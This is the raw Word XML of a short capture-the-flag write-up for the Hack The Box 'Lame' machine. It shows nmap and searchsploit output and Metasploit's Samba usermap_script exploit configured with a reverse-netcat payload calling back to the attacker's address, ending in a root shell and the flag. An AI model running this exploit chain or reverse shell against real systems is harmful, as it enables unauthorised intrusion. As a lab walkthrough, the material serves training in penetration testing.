    <w:p w14:paraId="3F376F23" w14:textId="4E9EC312" w:rsidR="008B45C8" w:rsidRDefault="008B45C8" w:rsidP="008B45C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve">I then use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find</w:t>
      </w:r>
      <w:r w:rsidR="002D3707">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> an exploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6297A5B6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Service detection performed. Please report any incorrect results at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">https://nmap.org/submit/ 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>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6EBD181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Nmap done: 1 IP address (1 host up) scanned in 52.26 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67516C63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DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>┌──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>(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keenan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DroidSansFallback" w:eastAsia="DroidSansFallback" w:hAnsi="BitstreamVeraSans-Roman" w:cs="DroidSansFallback" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>㉿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>kali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)-[~/Desktop/HTB/Lame]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B809ED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DejaVuSans" w:eastAsia="DejaVuSans" w:hAnsi="BitstreamVeraSans-Roman" w:cs="DejaVuSans" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>└─</w:t>
      </w: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$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searchsploit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 samba 3.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64619B84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------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F980FAA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---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579DB822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Exploit Title | Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ADE636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------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22659B1B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---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC2D75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Samba 3.0.10 &lt; 3.3.5 - Format String / Security Bypass |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B68A265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multiple/remote/10095.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182ABBB5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Samba 3.0.20 &lt; 3.0.25rc3 - 'Username' map script' Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6FDF61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(Metasploit) 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unix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/remote/16320.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D950CC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Samba &lt; 3.0.20 - Remote Heap Overflow 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linux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/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD83AA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remote/7701.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B0FDC8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Samba &lt; 3.0.20 - Remote Heap Overflow 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linux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/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04A025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remote/7701.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68809803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Samba &lt; 3.6.2 (x86) - Denial of Service (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PoC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) |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F8F87" w14:textId="0EEB3317" w:rsidR="0001249D" w:rsidRDefault="0001249D" w:rsidP="0001249D">
      <w:pPr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linux_x86/dos/36741.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43773E90" w14:textId="77777777" w:rsidR="0001249D" w:rsidRP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</w:pPr>
      <w:r w:rsidRPr="0001249D">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">THIS exploit can be done via Metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E112C1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</w:p>
    <w:p w14:paraId="40BFD7AF" w14:textId="50A7F14E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>Samba 3.0.20 &lt; 3.0.25rc3 - 'Username' map script' Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC238E8" w14:textId="77777777" w:rsidR="0001249D" w:rsidRDefault="0001249D" w:rsidP="0001249D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color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">(Metasploit) | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/remote/16320.rb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63058E0B" w14:textId="028D482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BoldOblique" w:hAnsi="BitstreamVeraSans-BoldOblique" w:cs="BitstreamVeraSans-BoldOblique"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="31"/>
          <w:szCs w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67271CF4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msf5 exploit(multi/samba/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usermap_script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) &gt; options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E9820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Module options (exploit/multi/samba/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usermap_script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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136EFB83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Name Current Setting Required Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B39C0B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---- --------------- -------- -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C762877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RHOSTS 10.10.10.3 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yes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 xml:space="preserve"> The target host(s), range CIDR identifier, or hosts file with syntax 'file:&lt;path&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB283C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RPORT 139 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yes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 xml:space="preserve"> The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4358D2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Payload options (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cmd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/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unix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/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reverse_netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB32DA7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Name Current Setting Required Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB56CE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---- --------------- -------- -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066DEF7C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LHOST 10.10.14.37 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yes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 xml:space="preserve"> The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAAC3B2" w14:textId="0115A051" w:rsidR="002D7A78" w:rsidRDefault="002D7A78" w:rsidP="002D7A78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LPORT 443 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>yes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B3F3FC" w14:textId="2D2B19B0" w:rsidR="002D7A78" w:rsidRDefault="002D7A78" w:rsidP="002D7A78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr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 xml:space="preserve">After </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>confiming</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>settings  I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> did manage to get a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADB7E2F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Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71848F56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Id Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057BD447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-- ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8B48FC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0 </w:t>
      </w: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Als</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C7BD74B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bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FF39E1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boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C3A36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cdrom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C3222C7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dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6CFB31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etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01ED6AE9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home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2B1389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initrd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B992CA9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initrd.img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E534193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initrd.img.old</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B078E94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lib</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3BF58614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lost+found</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55257D96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media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4FD8E8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mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="044107F6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nohup.out</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DDB2D60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opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68A0E0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proc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0ABE3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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFED658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sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E71AE43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srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A36EDF9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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685434AF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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01760581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usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27BDD6DE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var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E8D48C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vmlinuz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="572ED24A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vmlinuz.old</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A4657B8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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69854F99" w14:textId="11CC50D1" w:rsidR="002D7A78" w:rsidRDefault="002D7A78" w:rsidP="002D7A78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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B822E9A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cd</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4C42D4DD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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECF322" w14:textId="77777777" w:rsidR="002D7A78" w:rsidRDefault="002D7A78" w:rsidP="002D7A78">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/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Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A697853" w14:textId="77777777" w:rsidR="002D7A78" w:rsidRDefault="002D7A78" w:rsidP="002D7A78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>reset_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64618FE4" w14:textId="22D22F23" w:rsidR="002D7A78" w:rsidRPr="002D7A78" w:rsidRDefault="002D7A78" w:rsidP="002D7A78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">root.txt- </w:t>
      </w:r>
      <w:r w:rsidRPr="002D7A78">
        <w:rPr>
          <w:rFonts w:ascii="BitstreamVeraSans-Roman" w:hAnsi="BitstreamVeraSans-Roman" w:cs="BitstreamVeraSans-Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>And here is the flag.!!!!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002D7A78" w:rsidRPr="002D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VeraSans-BoldObliq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tstreamVeraSans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itstreamVeraSansMon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roidSansFallback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8"/>
    <w:rsid w:val="0001249D"/>
    <w:rsid w:val="002D3707"/>
    <w:rsid w:val="002D7A78"/>
    <w:rsid w:val="005F77AE"/>
    <w:rsid w:val="008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F9A7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B2B0E9E-F526-43F4-9DDD-EC4E173D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2021-11-01T16:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-01T17:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>